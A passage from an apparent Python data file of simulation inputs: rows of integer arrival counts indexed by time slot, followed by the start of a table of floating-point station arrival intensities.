(16, 11, 13, 12, 8, 5, 5, 6, 5, 1, 0, 1, 0, 14, 13, 15, 7, 14, 5, 6, 4, 2, 4, 2, 2, 0), # 59
(12, 14, 8, 14, 8, 9, 4, 5, 9, 0, 3, 1, 0, 25, 9, 11, 7, 8, 5, 6, 1, 5, 3, 1, 1, 0), # 60
(17, 15, 10, 9, 10, 6, 4, 3, 6, 4, 2, 2, 0, 8, 12, 7, 4, 10, 7, 4, 2, 4, 3, 4, 3, 0), # 61
(14, 13, 7, 14, 4, 3, 5, 5, 5, 3, 1, 1, 0, 18, 9, 10, 9, 10, 6, 6, 2, 3, 4, 4, 0, 0), # 62
(10, 18, 6, 10, 7, 3, 7, 3, 5, 4, 2, 1, 0, 6, 16, 7, 6, 11, 3, 6, 1, 5, 7, 3, 1, 0), # 63
(16, 15, 11, 15, 13, 4, 3, 3, 8, 3, 2, 1, 0, 15, 12, 8, 4, 9, 7, 9, 4, 7, 3, 0, 1, 0), # 64
(14, 16, 11, 9, 13, 4, 4, 7, 4, 6, 1, 1, 0, 11, 14, 8, 5, 15, 5, 3, 6, 5, 8, 5, 1, 0), # 65
(12, 11, 13, 15, 7, 4, 7, 0, 6, 5, 2, 0, 0, 11, 24, 13, 2, 8, 4, 6, 5, 3, 8, 2, 0, 0), # 66
(15, 15, 13, 13, 16, 5, 2, 7, 1, 4, 5, 2, 0, 10, 13, 16, 9, 13, 6, 4, 8, 5, 6, 5, 1, 0), # 67
(14, 9, 15, 9, 15, 8, 5, 6, 2, 0, 4, 1, 0, 6, 10, 8, 6, 8, 8, 6, 3, 4, 6, 1, 1, 0), # 68
(15, 11, 11, 16, 10, 3, 6, 3, 5, 5, 2, 0, 0, 16, 12, 9, 7, 17, 7, 3, 4, 2, 7, 0, 0, 0), # 69
(10, 10, 14, 13, 13, 4, 9, 6, 5, 2, 5, 1, 0, 17, 15, 6, 13, 8, 10, 4, 2, 5, 5, 1, 0, 0), # 70
(13, 12, 10, 22, 17, 8, 5, 3, 5, 3, 2, 4, 0, 14, 12, 10, 5, 12, 5, 9, 4, 4, 4, 4, 3, 0), # 71
(16, 11, 10, 13, 14, 6, 4, 7, 8, 2, 0, 0, 0, 13, 14, 15, 8, 13, 8, 3, 2, 6, 4, 3, 2, 0), # 72
(14, 14, 9, 11, 11, 3, 2, 6, 4, 3, 1, 0, 0, 16, 15, 8, 10, 11, 7, 5, 1, 10, 2, 2, 1, 0), # 73
(16, 8, 8, 6, 5, 8, 6, 3, 4, 1, 3, 2, 0, 17, 14, 4, 8, 12, 9, 5, 5, 6, 3, 1, 3, 0), # 74
(13, 23, 8, 14, 9, 5, 3, 3, 10, 2, 2, 1, 0, 21, 11, 10, 17, 8, 8, 7, 4, 8, 3, 5, 1, 0), # 75
(14, 16, 7, 11, 15, 9, 4, 5, 6, 3, 1, 1, 0, 10, 11, 9, 3, 10, 2, 5, 9, 5, 4, 3, 1, 0), # 76
(10, 16, 9, 17, 15, 4, 5, 9, 10, 3, 1, 2, 0, 15, 16, 10, 8, 10, 6, 6, 4, 1, 5, 2, 1, 0), # 77
(13, 8, 13, 20, 7, 7, 9, 1, 5, 2, 4, 0, 0, 10, 14, 5, 8, 8, 3, 4, 3, 2, 5, 2, 1, 0), # 78
(19, 11, 13, 11, 9, 3, 10, 2, 4, 2, 2, 3, 0, 24, 16, 12, 7, 11, 12, 5, 3, 6, 6, 2, 2, 0), # 79
(18, 17, 10, 6, 7, 4, 4, 8, 4, 1, 2, 1, 0, 14, 12, 12, 8, 10, 4, 6, 7, 6, 5, 4, 1, 0), # 80
(10, 13, 10, 8, 7, 4, 5, 3, 3, 4, 0, 0, 0, 12, 6, 9, 10, 16, 6, 6, 6, 8, 8, 4, 0, 0), # 81
(16, 15, 6, 10, 7, 1, 6, 4, 8, 2, 0, 0, 0, 18, 12, 4, 4, 11, 2, 7, 3, 6, 6, 4, 0, 0), # 82
(10, 10, 12, 4, 10, 3, 4, 5, 8, 3, 0, 2, 0, 12, 13, 9, 5, 20, 2, 4, 4, 4, 7, 1, 1, 0), # 83
(12, 16, 13, 9, 13, 4, 5, 4, 2, 2, 1, 0, 0, 15, 13, 15, 6, 10, 6, 7, 2, 5, 4, 3, 3, 0), # 84
(10, 9, 15, 17, 9, 3, 6, 5, 5, 1, 1, 0, 0, 13, 11, 13, 5, 13, 11, 7, 7, 2, 1, 1, 1, 0), # 85
(18, 11, 9, 11, 5, 6, 6, 2, 5, 3, 3, 1, 0, 12, 15, 8, 3, 10, 5, 3, 6, 5, 3, 1, 0, 0), # 86
(11, 6, 14, 11, 14, 5, 4, 7, 5, 2, 4, 1, 0, 19, 15, 7, 5, 11, 6, 4, 0, 9, 4, 2, 2, 0), # 87
(12, 6, 12, 9, 14, 4, 7, 6, 4, 3, 3, 0, 0, 12, 14, 4, 11, 13, 8, 3, 7, 7, 2, 2, 0, 0), # 88
(18, 10, 13, 13, 12, 9, 6, 3, 10, 5, 1, 0, 0, 17, 8, 8, 9, 14, 2, 4, 2, 8, 2, 5, 1, 0), # 89
(15, 7, 11, 7, 15, 5, 7, 5, 6, 3, 2, 0, 0, 10, 15, 9, 11, 12, 3, 5, 5, 6, 0, 0, 3, 0), # 90
(12, 11, 14, 11, 15, 3, 7, 7, 4, 2, 1, 1, 0, 13, 9, 12, 3, 4, 8, 6, 4, 3, 9, 4, 0, 0), # 91
(19, 12, 12, 14, 8, 7, 3, 4, 1, 1, 5, 1, 0, 19, 10, 8, 4, 7, 6, 5, 4, 4, 1, 2, 0, 0), # 92
(14, 6, 15, 17, 8, 11, 3, 8, 8, 1, 1, 1, 0, 7, 16, 13, 7, 8, 6, 1, 7, 4, 1, 2, 2, 0), # 93
(15, 14, 13, 17, 6, 2, 3, 4, 9, 2, 2, 3, 0, 11, 15, 9, 2, 19, 3, 5, 3, 5, 4, 1, 0, 0), # 94
(20, 14, 9, 13, 10, 2, 8, 3, 4, 0, 2, 1, 0, 17, 10, 15, 3, 7, 8, 1, 4, 11, 4, 0, 2, 0), # 95
(13, 10, 16, 10, 12, 4, 5, 1, 2, 2, 3, 1, 0, 12, 12, 10, 4, 9, 6, 2, 0, 6, 2, 0, 0, 0), # 96
(12, 10, 12, 12, 10, 4, 3, 2, 3, 3, 2, 0, 0, 9, 9, 10, 10, 10, 4, 9, 4, 8, 4, 4, 2, 0), # 97
(13, 12, 7, 12, 10, 1, 3, 4, 10, 0, 0, 3, 0, 11, 12, 12, 2, 14, 7, 2, 0, 4, 7, 4, 3, 0), # 98
(17, 11, 12, 11, 9, 5, 3, 4, 2, 1, 1, 2, 0, 14, 10, 11, 5, 12, 5, 2, 5, 3, 4, 2, 2, 0), # 99
(15, 18, 15, 16, 9, 2, 4, 8, 6, 4, 5, 1, 0, 17, 11, 9, 6, 5, 4, 6, 7, 3, 2, 4, 1, 0), # 100
(10, 13, 16, 14, 9, 6, 8, 2, 9, 3, 0, 0, 0, 17, 12, 6, 3, 15, 5, 6, 2, 4, 10, 2, 2, 0), # 101
(14, 12, 9, 10, 12, 6, 7, 3, 4, 2, 2, 0, 0, 13, 10, 2, 6, 8, 5, 5, 3, 3, 0, 1, 1, 0), # 102
(16, 7, 6, 11, 12, 10, 7, 5, 8, 6, 0, 0, 0, 16, 9, 7, 5, 6, 7, 3, 2, 4, 9, 1, 1, 0), # 103
(15, 8, 13, 11, 14, 2, 3, 5, 6, 3, 4, 4, 0, 8, 16, 6, 9, 9, 6, 3, 2, 11, 4, 4, 1, 0), # 104
(12, 15, 7, 13, 10, 4, 7, 0, 7, 2, 2, 0, 0, 14, 7, 8, 6, 12, 8, 5, 3, 8, 5, 3, 2, 0), # 105
(14, 8, 10, 9, 8, 3, 4, 6, 5, 4, 5, 2, 0, 20, 8, 14, 5, 11, 7, 4, 8, 12, 4, 2, 0, 0), # 106
(15, 9, 17, 18, 10, 3, 7, 4, 6, 2, 5, 2, 0, 11, 13, 8, 5, 14, 6, 3, 4, 7, 6, 1, 0, 0), # 107
(11, 10, 6, 12, 12, 5, 1, 3, 6, 0, 5, 3, 0, 21, 7, 7, 12, 10, 3, 6, 3, 12, 3, 0, 1, 0), # 108
(13, 8, 8, 6, 12, 5, 3, 5, 5, 0, 0, 0, 0, 17, 10, 11, 5, 10, 3, 4, 4, 3, 4, 2, 0, 0), # 109
(19, 11, 8, 20, 10, 7, 4, 4, 5, 4, 1, 0, 0, 13, 9, 5, 2, 10, 4, 7, 4, 6, 1, 2, 1, 0), # 110
(7, 14, 11, 12, 11, 3, 7, 4, 7, 1, 1, 2, 0, 8, 7, 7, 8, 10, 2, 5, 2, 6, 3, 1, 2, 0), # 111
(22, 14, 7, 8, 10, 4, 4, 1, 7, 3, 0, 3, 0, 15, 15, 7, 5, 12, 5, 5, 8, 3, 2, 3, 0, 0), # 112
(4, 9, 16, 9, 14, 2, 2, 4, 5, 3, 2, 0, 0, 18, 4, 7, 5, 16, 5, 6, 7, 8, 3, 3, 2, 0), # 113
(18, 6, 13, 7, 5, 5, 5, 4, 6, 1, 1, 0, 0, 9, 9, 10, 10, 14, 4, 5, 0, 2, 4, 1, 2, 0), # 114
(20, 9, 9, 15, 12, 6, 2, 0, 3, 5, 2, 0, 0, 16, 14, 5, 7, 8, 5, 8, 2, 3, 1, 3, 1, 0), # 115
(14, 10, 19, 5, 12, 8, 4, 6, 3, 3, 1, 2, 0, 10, 5, 9, 6, 6, 3, 5, 2, 5, 6, 2, 0, 0), # 116
(9, 15, 15, 12, 10, 10, 2, 7, 8, 1, 1, 1, 0, 19, 9, 11, 11, 10, 7, 1, 1, 4, 7, 2, 1, 0), # 117
(15, 14, 11, 9, 11, 1, 3, 4, 11, 2, 1, 2, 0, 8, 10, 8, 6, 15, 3, 4, 3, 9, 1, 1, 1, 0), # 118
(14, 12, 11, 11, 12, 7, 4, 5, 1, 3, 1, 2, 0, 18, 7, 11, 10, 10, 10, 3, 3, 4, 5, 2, 0, 0), # 119
(12, 12, 11, 15, 12, 2, 5, 2, 6, 0, 3, 2, 0, 13, 8, 7, 6, 11, 6, 2, 7, 4, 2, 2, 0, 0), # 120
(14, 10, 17, 13, 7, 3, 4, 5, 2, 4, 0, 2, 0, 15, 10, 8, 6, 7, 6, 7, 2, 1, 2, 2, 0, 0), # 121
(18, 10, 10, 15, 7, 6, 8, 2, 5, 3, 4, 2, 0, 12, 13, 6, 5, 9, 8, 5, 6, 8, 3, 3, 0, 0), # 122
(13, 10, 17, 8, 6, 5, 3, 6, 5, 0, 5, 0, 0, 14, 10, 7, 6, 11, 0, 2, 2, 4, 4, 1, 1, 0), # 123
(12, 12, 8, 14, 9, 6, 4, 2, 1, 0, 2, 0, 0, 12, 10, 7, 8, 8, 3, 7, 4, 8, 5, 1, 0, 0), # 124
(11, 5, 7, 18, 13, 3, 7, 2, 2, 1, 0, 0, 0, 11, 9, 9, 4, 4, 6, 6, 4, 4, 2, 2, 1, 0), # 125
(14, 7, 9, 17, 9, 6, 2, 1, 4, 0, 0, 2, 0, 17, 9, 6, 4, 14, 5, 4, 1, 1, 4, 2, 0, 0), # 126
(10, 9, 7, 7, 9, 0, 4, 3, 6, 1, 1, 0, 0, 15, 12, 10, 3, 5, 2, 8, 2, 7, 2, 3, 0, 0), # 127
(10, 13, 12, 11, 8, 8, 4, 2, 6, 1, 1, 1, 0, 10, 10, 8, 4, 8, 3, 2, 4, 5, 3, 2, 2, 0), # 128
(6, 9, 20, 14, 12, 3, 5, 6, 3, 0, 1, 2, 0, 15, 8, 7, 5, 5, 3, 6, 7, 3, 4, 2, 0, 0), # 129
(15, 5, 10, 10, 9, 2, 6, 2, 5, 5, 0, 1, 0, 12, 9, 9, 6, 7, 4, 1, 5, 2, 4, 1, 1, 0), # 130
(11, 4, 11, 6, 8, 4, 5, 1, 1, 2, 1, 2, 0, 11, 8, 5, 3, 5, 8, 7, 2, 7, 4, 2, 1, 0), # 131
(5, 9, 9, 4, 10, 5, 3, 3, 6, 0, 3, 3, 0, 11, 12, 5, 8, 5, 9, 6, 3, 8, 4, 1, 1, 0), # 132
(11, 18, 10, 12, 8, 4, 2, 5, 3, 3, 3, 0, 0, 10, 11, 9, 6, 8, 6, 3, 6, 4, 3, 1, 1, 0), # 133
(13, 10, 10, 6, 9, 8, 4, 5, 4, 0, 3, 1, 0, 16, 10, 6, 6, 17, 2, 5, 4, 8, 7, 2, 0, 0), # 134
(15, 12, 12, 9, 10, 4, 6, 2, 2, 0, 3, 0, 0, 12, 7, 10, 4, 9, 8, 5, 2, 4, 4, 8, 2, 0), # 135
(11, 12, 8, 16, 8, 2, 3, 6, 5, 2, 1, 1, 0, 11, 9, 7, 7, 4, 7, 2, 6, 9, 4, 1, 0, 0), # 136
(12, 3, 14, 7, 10, 5, 4, 3, 5, 1, 2, 2, 0, 13, 4, 4, 6, 6, 4, 5, 1, 7, 5, 2, 0, 0), # 137
(14, 12, 10, 14, 13, 3, 6, 4, 4, 6, 2, 0, 0, 11, 8, 9, 8, 9, 3, 2, 4, 4, 3, 1, 0, 0), # 138
(10, 10, 9, 16, 16, 4, 1, 5, 5, 0, 1, 0, 0, 12, 12, 7, 3, 8, 8, 4, 1, 5, 2, 3, 1, 0), # 139
(12, 10, 16, 9, 7, 1, 4, 2, 5, 2, 2, 3, 0, 7, 12, 8, 4, 11, 7, 6, 5, 3, 6, 2, 0, 0), # 140
(13, 8, 6, 5, 7, 7, 5, 6, 3, 0, 4, 0, 0, 13, 8, 4, 2, 6, 6, 4, 4, 1, 2, 1, 1, 0), # 141
(13, 11, 12, 14, 11, 5, 2, 3, 3, 0, 2, 2, 0, 12, 10, 3, 7, 9, 6, 8, 2, 5, 6, 4, 1, 0), # 142
(17, 4, 14, 8, 10, 6, 1, 5, 6, 1, 0, 2, 0, 18, 9, 8, 6, 12, 4, 5, 1, 6, 4, 4, 1, 0), # 143
(12, 13, 11, 10, 5, 2, 4, 1, 7, 4, 2, 0, 0, 9, 8, 6, 6, 8, 5, 3, 2, 3, 1, 2, 2, 0), # 144
(6, 14, 9, 8, 8, 4, 3, 3, 3, 1, 4, 0, 0, 19, 11, 9, 3, 14, 5, 5, 4, 2, 2, 4, 2, 0), # 145
(13, 8, 15, 11, 7, 3, 0, 2, 9, 1, 1, 1, 0, 15, 11, 11, 7, 13, 12, 2, 1, 2, 0, 3, 0, 0), # 146
(11, 10, 11, 11, 10, 5, 3, 2, 1, 3, 0, 1, 0, 13, 11, 9, 6, 9, 6, 4, 3, 2, 1, 0, 0, 0), # 147
(12, 3, 9, 10, 21, 7, 2, 6, 5, 0, 2, 1, 0, 9, 9, 3, 8, 11, 3, 3, 4, 5, 4, 0, 0, 0), # 148
(12, 7, 0, 12, 10, 9, 4, 1, 4, 1, 1, 2, 0, 12, 13, 10, 4, 7, 2, 3, 2, 8, 4, 3, 0, 0), # 149
(7, 9, 9, 8, 13, 3, 4, 3, 2, 1, 4, 0, 0, 13, 9, 10, 4, 9, 2, 2, 5, 5, 2, 5, 2, 0), # 150
(9, 14, 9, 10, 12, 2, 2, 3, 6, 2, 1, 1, 0, 11, 10, 9, 7, 8, 5, 2, 3, 0, 7, 1, 0, 0), # 151
(11, 13, 12, 6, 8, 4, 6, 7, 6, 2, 1, 0, 0, 10, 11, 8, 8, 5, 7, 4, 5, 5, 1, 1, 2, 0), # 152
(16, 4, 6, 13, 10, 7, 2, 3, 6, 4, 1, 0, 0, 10, 11, 5, 5, 8, 3, 6, 4, 5, 3, 2, 0, 0), # 153
(14, 8, 9, 8, 9, 2, 2, 3, 4, 2, 3, 0, 0, 14, 11, 4, 6, 9, 5, 5, 4, 2, 2, 0, 0, 0), # 154
(3, 5, 7, 4, 4, 6, 4, 8, 8, 0, 0, 1, 0, 13, 5, 4, 8, 7, 5, 5, 1, 3, 1, 1, 1, 0), # 155
(6, 9, 16, 14, 9, 4, 4, 2, 4, 1, 0, 0, 0, 11, 8, 3, 3, 6, 3, 7, 4, 4, 4, 4, 0, 0), # 156
(6, 15, 14, 9, 13, 5, 2, 1, 5, 3, 2, 0, 0, 14, 8, 8, 8, 13, 5, 3, 0, 5, 1, 3, 0, 0), # 157
(12, 6, 11, 13, 8, 4, 2, 1, 3, 4, 3, 2, 0, 9, 12, 10, 4, 12, 2, 2, 6, 3, 3, 2, 0, 0), # 158
(8, 7, 5, 11, 6, 6, 2, 1, 6, 1, 2, 1, 0, 9, 10, 5, 4, 8, 5, 4, 2, 5, 4, 3, 1, 0), # 159
(5, 7, 4, 4, 5, 5, 2, 2, 12, 2, 2, 0, 0, 7, 8, 7, 4, 9, 4, 4, 4, 7, 5, 1, 0, 0), # 160
(8, 6, 14, 7, 11, 7, 3, 2, 5, 3, 0, 1, 0, 8, 8, 4, 7, 18, 3, 4, 3, 2, 4, 5, 1, 0), # 161
(4, 6, 10, 12, 10, 6, 4, 5, 3, 2, 1, 1, 0, 12, 9, 6, 6, 9, 4, 3, 4, 5, 1, 4, 0, 0), # 162
(8, 8, 5, 14, 6, 4, 2, 5, 0, 3, 2, 1, 0, 8, 9, 4, 3, 7, 4, 2, 2, 3, 1, 1, 0, 0), # 163
(9, 10, 9, 12, 6, 5, 3, 3, 2, 1, 0, 1, 0, 7, 10, 5, 6, 9, 3, 6, 6, 5, 3, 1, 0, 0), # 164
(10, 6, 11, 11, 10, 5, 5, 2, 2, 2, 2, 0, 0, 9, 7, 6, 6, 10, 4, 1, 4, 3, 2, 0, 3, 0), # 165
(9, 11, 11, 8, 12, 2, 4, 0, 4, 1, 0, 1, 0, 14, 5, 6, 4, 5, 8, 3, 0, 3, 1, 3, 1, 0), # 166
(9, 6, 5, 8, 12, 9, 2, 1, 6, 1, 1, 1, 0, 14, 5, 2, 4, 12, 5, 3, 2, 5, 2, 1, 1, 0), # 167
(9, 5, 6, 11, 7, 4, 2, 0, 5, 1, 4, 1, 0, 12, 4, 6, 5, 1, 6, 1, 4, 4, 1, 1, 0, 0), # 168
(11, 5, 5, 7, 11, 2, 1, 4, 2, 2, 1, 2, 0, 10, 12, 5, 0, 5, 3, 2, 2, 3, 3, 2, 1, 0), # 169
(5, 3, 7, 10, 8, 2, 1, 0, 2, 4, 1, 2, 0, 3, 7, 5, 4, 7, 2, 1, 1, 0, 2, 0, 0, 0), # 170
(11, 6, 9, 11, 5, 3, 3, 1, 2, 0, 1, 0, 0, 9, 4, 7, 4, 9, 3, 0, 1, 2, 1, 1, 0, 0), # 171
(9, 7, 8, 7, 9, 2, 1, 4, 3, 2, 2, 0, 0, 3, 5, 5, 4, 3, 2, 2, 2, 3, 1, 0, 0, 0), # 172
(11, 5, 9, 9, 3, 1, 0, 1, 8, 2, 1, 1, 0, 5, 4, 9, 0, 6, 3, 1, 1, 6, 5, 1, 0, 0), # 173
(4, 6, 5, 10, 5, 5, 2, 2, 3, 2, 0, 0, 0, 8, 7, 4, 5, 8, 2, 1, 0, 3, 3, 0, 1, 0), # 174
(5, 2, 4, 4, 5, 0, 4, 4, 5, 0, 1, 0, 0, 8, 5, 7, 4, 6, 3, 2, 5, 3, 0, 1, 0, 0), # 175
(5, 9, 10, 5, 1, 1, 1, 3, 4, 2, 1, 1, 0, 5, 2, 2, 3, 5, 2, 0, 1, 2, 1, 2, 1, 0), # 176
(3, 3, 8, 7, 4, 4, 0, 2, 0, 1, 0, 1, 0, 8, 7, 3, 6, 7, 3, 2, 3, 3, 2, 1, 0, 0), # 177
(1, 3, 4, 6, 5, 2, 1, 3, 5, 1, 0, 1, 0, 4, 8, 8, 7, 7, 3, 2, 3, 3, 3, 0, 0, 0), # 178
(0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0), # 179
)
station_arriving_intensity = (
(7.029211809720476, 7.735403983570434, 7.29579652145751, 8.700534883408807, 7.776559850653457, 4.394116904852274, 5.804449861523481, 6.514446642171193, 8.52613868703521, 5.541221021731318, 5.887371229439844, 6.857081109628643, 7.117432297609708), # 0
(7.496058012827964, 8.246084971802663, 7.777485227862214, 9.275201954587263, 8.291486472463932, 4.684377017659578, 6.187256517769172, 6.943319212067992, 9.089143456866074, 5.90657296918801, 6.2763345903385845, 7.309703325140097, 7.587708306415797), # 1
(7.9614122125716245, 8.754739239247371, 8.257259199766379, 9.847582786530712, 8.804548163249642, 4.9734791603174235, 6.568545911144986, 7.370475347066188, 9.64990152962857, 6.270479285028765, 6.663752408286839, 7.760525712874277, 8.056110759493567), # 2
(8.423460910405188, 9.259348702711026, 8.733215217047796, 10.415406970544904, 9.313726346402664, 5.260276871619158, 6.946805098307138, 7.79422162049231, 10.206189225289531, 6.631495777796654, 7.0480877765583365, 8.207759958902646, 8.520781928755916), # 3
(8.880390607782374, 9.757895279000085, 9.203450059584252, 10.976404097935598, 9.81700244531509, 5.543623690358135, 7.320521135911843, 8.212864605672882, 10.75578286381579, 6.988178256034751, 7.4278037884268056, 8.64961774929667, 8.979864086115745), # 4
(9.330387806156915, 10.248360884921025, 9.666060507253526, 11.528303760008551, 10.312357883378994, 5.822373155327701, 7.688181080615314, 8.62471087593443, 11.296458765174183, 7.339082528286129, 7.801363537165986, 9.084310770127807, 9.43149950348596), # 5
(9.771639006982534, 10.728727437280302, 10.119143339933412, 12.068835548069513, 10.79777408398646, 6.09537880532121, 8.048271989073768, 9.028067004603484, 11.825993249331543, 7.682764403093862, 8.167230116049597, 9.510050707467531, 9.87383045277945), # 6
(10.202330711712957, 11.196976852884385, 10.56079533750169, 12.595729053424249, 11.271232470529577, 6.36149417913201, 8.39928091794342, 9.421239565006573, 12.342162636254702, 8.017779689001022, 8.523866618351377, 9.925049247387301, 10.304999205909127), # 7
(10.62064942180191, 11.651091048539739, 10.989113279836156, 13.1067138673785, 11.730714466400421, 6.619572815553446, 8.739694923880478, 9.802535130470215, 12.842743245910489, 8.342684194550685, 8.86973613734505, 10.327518075958585, 10.723148034787885), # 8
(11.02478163870312, 12.089051941052832, 11.402193946814586, 13.599519581238038, 12.174201494991074, 6.868468253378878, 9.068001063541168, 10.170260274320949, 13.325511398265744, 8.65603372828592, 9.20330176630435, 10.71566887925284, 11.126419211328628), # 9
(11.412913863870306, 12.508841447230123, 11.798134118314776, 14.071875786308604, 12.599674979693622, 7.107034031401651, 9.382686393581697, 10.522721569885295, 13.7882434132873, 8.956384098749801, 9.523026598503003, 11.087713343341534, 11.512955007444255), # 10
(11.783232598757209, 12.90844148387809, 12.175030574214501, 14.521512073895957, 13.005116343900148, 7.334123688415116, 9.682237970658283, 10.85822559048978, 14.228715610941991, 9.242291114485408, 9.82737372721475, 11.441863154296136, 11.880897695047656), # 11
(12.133924344817538, 13.285833967803178, 12.530980094391557, 14.946158035305858, 13.38850701100273, 7.5485907632126175, 9.965142851427137, 11.17507890946093, 14.644704311196652, 9.512310584035802, 10.114806245713309, 11.776329998188096, 12.22838954605175), # 12
(12.463175603505027, 13.639000815811869, 12.864079458723728, 15.343543261844063, 13.747828404393443, 7.749288794587514, 10.22988809254448, 11.471588100125276, 15.033985834018106, 9.764998315944066, 10.383787247272418, 12.08932556108889, 12.55357283236943), # 13
(12.769172876273403, 13.965923944710624, 13.172425447088806, 15.71139734481631, 14.081061947464386, 7.935071321333148, 10.474960750666526, 11.746059735809345, 15.39433649937319, 9.998910118753269, 10.6327798251658, 12.379061529069986, 12.85458982591359), # 14
(13.050102664576398, 14.264585271305906, 13.45411483936456, 16.047449875528383, 14.386189063607633, 8.104791882242878, 10.698847882449478, 11.99680038983966, 15.723532627228748, 10.212601801006487, 10.860247072667189, 12.64374958820284, 13.129582798597134), # 15
(13.30415146986772, 14.532966712404187, 13.707244415428796, 16.349430445286004, 14.661191176215267, 8.257304016110044, 10.900036544549568, 12.222116635542745, 16.019350537551603, 10.404629171246796, 11.06465208305032, 12.881601424558916, 13.376694022332964), # 16
(13.529505793601107, 14.769050184811926, 13.929910955159293, 16.61506864539496, 14.904049708679375, 8.391461261728, 11.077013793622996, 12.420315046245145, 16.27956655030858, 10.573548038017254, 11.24445794958892, 13.090828724209679, 13.594065769033982), # 17
(13.724352137230287, 14.970817605335585, 14.120211238433834, 16.842094067160993, 15.112746084392025, 8.506117157890104, 11.228266686325993, 12.589702195273366, 16.501956985466535, 10.717914209860952, 11.398127765556712, 13.269643173226603, 13.779840310613086), # 18
(13.88687700220898, 15.136250890781643, 14.27624204513021, 17.02823630188984, 15.285261726745313, 8.600125243389693, 11.352282279314753, 12.728584655953943, 16.68429816299229, 10.83628349532096, 11.52412462422743, 13.416256457681136, 13.932159918983176), # 19
(14.015266889990915, 15.263331957956549, 14.396100155126206, 17.171224940887296, 15.419578059131322, 8.672339057020126, 11.44754762924551, 12.835269001613405, 16.82436640285268, 10.927211702940342, 11.62091161887481, 13.528880263644748, 14.049166866057154), # 20
(14.107708302029813, 15.350042723666784, 14.477882348299607, 17.26878957545908, 15.513676504942126, 8.72161213757475, 11.512549792774463, 12.908061805578273, 16.91993802501453, 10.989254641262178, 11.686951842772585, 13.60572627718891, 14.12900342374791), # 21
(14.162387739779412, 15.394365104718803, 14.5196854045282, 17.31865979691097, 15.565538487569807, 8.746798023846914, 11.54577582655784, 12.945269641175082, 16.968789349444684, 11.02096811882954, 11.720708389194478, 13.645006184385087, 14.16981186396836), # 22
(14.182550708679697, 15.39961303155007, 14.524892455418383, 17.324903137860087, 15.578824878445637, 8.75, 11.549725603163076, 12.949291358024693, 16.974896728395063, 11.024709181527207, 11.724941252026436, 13.649856607224509, 14.175), # 23
(14.197417378247815, 15.396551851851854, 14.524040740740743, 17.324134722222226, 15.586350659060795, 8.75, 11.547555337690634, 12.943700000000002, 16.974078333333335, 11.02241086419753, 11.724474410774413, 13.648720987654322, 14.175), # 24
(14.211970122296213, 15.390517832647463, 14.522359396433473, 17.322614454732513, 15.593710923832306, 8.75, 11.543278463648836, 12.932716049382718, 16.97246141975309, 11.01788637402835, 11.723548759196907, 13.646479195244629, 14.175), # 25
(14.226207826667249, 15.381603155006863, 14.519871467764064, 17.320359619341563, 15.600905415789548, 8.75, 11.53696140563221, 12.916546913580248, 16.97006672839506, 11.011210992226795, 11.722172677391198, 13.643161957018751, 14.175), # 26
(14.240129377203292, 15.3699, 14.5166, 17.3173875, 15.607933877961901, 8.75, 11.528670588235297, 12.895400000000002, 16.966915, 11.00246, 11.720354545454546, 13.638800000000003, 14.175), # 27
(14.253733659746702, 15.355500548696845, 14.51256803840878, 17.313715380658437, 15.614796053378763, 8.75, 11.518472436052612, 12.869482716049385, 16.963026975308644, 10.9917086785551, 11.718102743484225, 13.633424051211708, 14.175), # 28
(14.26701956013985, 15.338496982167355, 14.50779862825789, 17.30936054526749, 15.62149168506951, 8.75, 11.506433373678693, 12.839002469135803, 16.95842339506173, 10.979032309099225, 11.715425651577503, 13.627064837677183, 14.175), # 29
(14.279985964225098, 15.318981481481483, 14.502314814814815, 17.30434027777778, 15.628020516063533, 8.75, 11.492619825708061, 12.804166666666665, 16.953125, 10.964506172839508, 11.71233164983165, 13.619753086419752, 14.175), # 30
(14.292631757844802, 15.297046227709194, 14.496139643347053, 17.29867186213992, 15.634382289390214, 8.75, 11.477098216735257, 12.765182716049384, 16.947152530864198, 10.948205550983083, 11.708829118343933, 13.611519524462738, 14.175), # 31
(14.304955826841338, 15.27278340192044, 14.489296159122084, 17.29237258230453, 15.640576748078935, 8.75, 11.4599349713548, 12.72225802469136, 16.940526728395064, 10.930205724737084, 11.704926437211622, 13.602394878829449, 14.175), # 32
(14.316957057057056, 15.246285185185185, 14.481807407407409, 17.28545972222222, 15.646603635159089, 8.75, 11.441196514161222, 12.675600000000001, 16.933268333333334, 10.910581975308643, 11.700631986531986, 13.59240987654321, 14.175), # 33
(14.328634334334335, 15.217643758573388, 14.473696433470508, 17.27795056584362, 15.652462693660054, 8.75, 11.420949269749054, 12.625416049382716, 16.925398086419758, 10.889409583904893, 11.695954146402293, 13.581595244627344, 14.175), # 34
(14.339986544515531, 15.186951303155007, 14.464986282578877, 17.26986239711934, 15.65815366661122, 8.75, 11.399259662712824, 12.571913580246914, 16.916936728395065, 10.866763831732968, 11.690901296919815, 13.569981710105168, 14.175), # 35
(14.35101257344301, 15.1543, 14.455700000000002, 17.2612125, 15.663676297041972, 8.75, 11.37619411764706, 12.515300000000002, 16.907905, 10.84272, 11.685481818181819, 13.557600000000003, 14.175), # 36
(14.361711306959135, 15.119782030178326, 14.445860631001374, 17.252018158436215, 15.669030327981691, 8.75, 11.351819059146292, 12.455782716049384, 16.89832364197531, 10.817353369913125, 11.679704090285574, 13.544480841335163, 14.175), # 37
(14.372081630906267, 15.083489574759948, 14.43549122085048, 17.242296656378603, 15.674215502459768, 8.75, 11.326200911805053, 12.393569135802473, 16.88821339506173, 10.790739222679472, 11.673576493328346, 13.530654961133976, 14.175), # 38
(14.382122431126781, 15.045514814814815, 14.424614814814818, 17.232065277777778, 15.679231563505585, 8.75, 11.299406100217867, 12.328866666666666, 16.877595000000003, 10.762952839506175, 11.667107407407409, 13.516153086419752, 14.175), # 39
(14.39183259346303, 15.005949931412895, 14.413254458161866, 17.221341306584364, 15.684078254148528, 8.75, 11.271501048979264, 12.261882716049385, 16.866489197530868, 10.734069501600368, 11.660305212620028, 13.501005944215823, 14.175), # 40
(14.40121100375738, 14.964887105624143, 14.401433196159124, 17.210142026748972, 15.688755317417984, 8.75, 11.242552182683774, 12.192824691358027, 16.85491672839506, 10.704164490169182, 11.653178289063476, 13.485244261545498, 14.175), # 41
(14.410256547852201, 14.922418518518521, 14.389174074074077, 17.198484722222226, 15.693262496343333, 8.75, 11.212625925925927, 12.121900000000002, 16.842898333333338, 10.673313086419753, 11.645735016835017, 13.4688987654321, 14.175), # 42
